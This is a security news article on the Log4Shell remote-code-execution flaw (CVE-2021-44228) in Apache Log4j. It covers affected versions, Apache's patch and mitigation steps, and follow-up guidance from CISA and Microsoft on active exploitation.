Researchers discover Critical RCE 0-day “Log4Shell” vulnerability (CVE-2021-44228) in Apache Log4j logging utility (update)

Researchers discover Critical RCE 0-day "Log4Shell" vulnerability in Apache Log4j logging utility

Researchers have discovered a Critical 0-day vulnerability (CVE-2021-44228) in Apache Log4j logging utility that can result in remote code execution (RCE) by logging a certain string. In addition, CISA and Microsoft also issue new guidance for Log4j vulnerability remediation.

A cyber attacker could exploit this vulnerability to take control of an affected system.

The RCE vulnerability CVE-2021-44228 is caused by Apache Log4j2 JNDI features that do not protect against attacker controlled LDAP and other JNDI related endpoints. The vulnerability is rated Critical (base CVSS score of 10.0) and affects versions 2.0-beta9 to 2.14.1

Apache described the vulnerability in a recent security update for log4j version 2.15.0 that addresses the threat:

“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”

Apache Software Foundation

Apache also added more details on the mitigation provided in the log4j 2.15.0 update, as well as workarounds for systems that may not be able to be patched right away.

“In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class,” Apache added.

Moreover, researchers from LunaSec have warned the vulnerability, they dub “Log4Shell,” is quite easy to exploit in the wild.

“Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.”

LunaSec also warned that “many, many services are vulnerable to this exploit,” such as Steam and Apple cloud services, as well as Minecraft and Apache Struts apps. They added similar vulnerabilities were exploited before such as the infamous 2017 Equifax data breach.

Finally, a proof of concept (PoC) exploit code for Apache Log4j (CVE-2021-44228) has also been published to GitHub.

Update December 15, 2021:

The Cybersecurity and Infrastructure Security Agency (CISA) has created a new webpage, Apache Log4j Vulnerability Guidance, as well as a community-sourced GitHub repository to help organizations with additional guidance for log4j vulnerability remediation.

To add, Microsoft also issued a blog update on December 15 with additional information on ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, to include Threat and Vulnerability Management.

Previously, Microsoft also warned nation-state actors and access brokers linked to ransomware were also exploiting the log4j vulnerability.

Related Articles